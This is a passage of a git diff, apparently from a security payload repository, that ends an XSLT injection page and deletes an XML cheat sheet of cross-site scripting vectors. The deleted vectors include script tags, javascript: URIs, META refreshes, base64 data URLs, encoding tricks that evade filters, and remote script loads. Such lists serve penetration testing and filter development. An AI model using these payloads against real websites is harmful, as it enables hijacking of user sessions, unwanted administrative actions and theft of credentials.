+          </TD>
+          </TR>
+        </xsl:for-each>
+      </TABLE>
+    </xsl:template>
+  </xsl:stylesheet>
+```
+
+## References
+
+* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
+* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
+* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
\ No newline at end of file
diff --git a/XSS Injection/Files/XML_XSS_cheatsheet.html b/XSS Injection/Files/XML_XSS_cheatsheet.html
deleted file mode 100644
index df741b6d..00000000
--- a/XSS Injection/Files/XML_XSS_cheatsheet.html	
+++ /dev/null
@@ -1,1307 +0,0 @@
-<?xml version="1.0"?>
-<xss>
-	<attack>
-		<name>XSS Locator</name>
-		<code>&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}</code>
-
-		<desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word &quot;XSS&quot; will pop up.  You&apos;ll need to replace the &quot;&amp;&quot; with &quot;%26&quot; if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable.  Tip: If you&apos;re in a rush and need to quickly check a page, often times injecting the deprecated &quot;&lt;PLAINTEXT&gt;&quot; tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
-		<label>Basic XSS Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>XSS Quick Test</name>
-		<code>&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}</code>
-		<desc>If you don&apos;t have much space, this string is a nice compact XSS injection check. View source after injecting it and look for &lt;XSS versus &amp;lt;XSS to see if it is vulnerable.</desc>
-
-		<label>Basic XSS Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>SCRIPT w/Alert()</name>
-		<code>&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;</code>
-		<desc>Basic injection attack</desc>
-
-		<label>Basic XSS Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>SCRIPT w/Source File</name>
-		<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
-		<desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
-		<label>Basic XSS Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>SCRIPT w/Char Code</name>
-		<code>&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</code>
-		<desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word &quot;XSS&quot; will pop up.</desc>
-
-		<label>Basic XSS Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>BASE</name>
-		<code>&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;</code>
-		<desc>Works in IE and Netscape 8.1 in safe mode.  You need the // to comment out the next characters so you won&apos;t get a JavaScript error and your XSS tag will render.  Also, this relies on the fact that the website uses dynamically placed images like &quot;images/image.jpg&quot; rather than full paths.  If the path includes a leading forward slash like &quot;/images/image.jpg&quot; you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>BGSOUND</name>
-		<code>&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>BGSOUND</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>BODY background-image</name>
-		<code>&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>BODY image</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>BODY ONLOAD</name>
-		<code>&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;</code>
-		<desc>BODY tag (I like this method because it doesn&apos;t require using any variants of &quot;javascript:&quot; or &quot;&lt;SCRIPT...&quot; to accomplish the XSS attack)</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>DIV background-image 1</name>
-		<code>&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;</code>
-		<desc>Div background-image</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>DIV background-image 2</name>
-		<code>&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;</code>
-		<desc>Div background-image plus extra characters.  I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course.  (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>DIV expression</name>
-		<code>&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;</code>
-		<desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and &quot;expression&quot;</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>FRAME</name>
-		<code>&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;</code>
-		<desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IFRAME</name>
-		<code>&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;</code>
-		<desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>INPUT Image</name>
-		<code>&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>INPUT Image</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-	</attack>
-
-	<attack>
-		<name>IMG w/JavaScript Directive</name>
-		<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Image XSS using the JavaScript directive.</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IMG No Quotes/Semicolon</name>
-		<code>&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;</code>
-		<desc>No quotes and no semicolon</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IMG Dynsrc</name>
-		<code>&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>IMG Dynsrc</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IMG Lowsrc</name>
-		<code>&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>IMG Lowsrc</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IMG Embedded commands 1</name>
-		<code>&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
-		<desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain.  This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc...  This is one of the lesser used but more useful XSS vectors.</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IMG Embedded commands 2</name>
-		<code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</code>
-		<desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC=&quot;http://badguy.com/a.jpg&quot;&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IMG STYLE w/expression</name>
-		<code>exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
-xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</code>
-
-		<desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>List-style-image</name>
-		<code>&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</code>
-
-		<desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IMG w/VBscript</name>
-		<code>&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;</code>
-		<desc>VBscript in an image</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>LAYER</name>
-		<code>&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
-		<desc>Layer (Older Netscape only)</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Livescript</name>
-		<code>&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;</code>
-		<desc>Livescript (Older Netscape only)</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>US-ASCII encoding</name>
-		<code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
-		<desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8.  This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself.  This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion.  Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS4&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>META</name>
-		<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>The odd thing about meta refresh is that it doesn&apos;t send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>META w/data:URL</name>
-		<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;</code>
-		<desc>This is nice because it also doesn&apos;t have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>META w/additional URL parameter</name>
-		<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
-		<desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an &quot;http://&quot; you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Mocha</name>
-		<code>&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;</code>
-		<desc>Mocha (Older Netscape only)</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>OBJECT</name>
-		<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
-		<desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>OBJECT w/Embedded XSS</name>
-		<code>&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;</code>
-		<desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support:</browser>
-	</attack>
-	<attack>
-		<name>Embed Flash</name>
-		<code>&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
-
-		<desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=&quot;never&quot; and allownetworking=&quot;internal&quot; it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>OBJECT w/Flash 2</name>
-		<code>a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);</code>
-
-		<desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>STYLE</name>
-		<code>&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;</code>
-		<desc>STYLE tag (Older versions of Netscape only)</desc>
-
-		<label>HTML Element Attacks</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>STYLE w/Comment</name>
-		<code>&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;</code>
-		<desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
-		<label>HTML Element Attacks</label>
-
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
